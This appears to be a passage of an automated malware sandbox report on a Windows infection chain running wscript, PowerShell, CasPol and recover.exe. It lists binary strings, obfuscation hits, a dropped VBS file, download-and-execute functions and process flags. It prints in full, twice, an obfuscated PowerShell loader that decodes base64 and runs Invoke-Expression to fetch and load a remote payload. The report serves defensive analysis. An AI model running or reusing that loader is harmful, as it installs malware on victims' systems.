Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype( source: powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflags source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

8_2_0041D0CF

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573D6F1 push esi; iretd	3_2_0573D6F2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573CE76 push ebp; iretd	3_2_0573CE82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573DA27 push ebp; iretd	3_2_0573DA2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573CB51 push esi; iretd	3_2_0573CB52
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573DA16 push ebp; iretd	3_2_0573DA22
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_03282AAB pushad ; retf	5_2_03282AB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_03283EF7 push ebp; ret	5_2_03283EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004570CF push ecx; ret	8_2_004570E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00435226 push ecx; ret	8_2_00435239
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0045D9ED push esi; ret	8_2_0045D9F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00457A00 push eax; ret	8_2_00457A1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10002806 push ecx; ret	8_2_10002819
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00446B75 push ecx; ret	9_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00452BB4 push eax; ret	9_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044DDB0 push eax; ret	9_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044DDB0 push eax; ret	9_2_0044DDEC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044B090 push eax; ret	10_2_0044B0A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044B090 push eax; ret	10_2_0044B0CC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00451D34 push eax; ret	10_2_00451D41
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00444E71 push ecx; ret	10_2_00444E81
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414060 push eax; ret	11_2_00414074
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414060 push eax; ret	11_2_0041409C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414039 push ecx; ret	11_2_00414049
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004164EB push 0000006Ah; retf	11_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00416553 push 0000006Ah; retf	11_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00416555 push 0000006Ah; retf	11_2_004165C4

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Temp\Sheena.vbs

Jump to behavior

Contains functionality to download and launch executables

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_004062E2 ShellExecuteW,URLDownloadToFileW,

8_2_004062E2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_0041AC43

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

8_2_0041D0CF

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
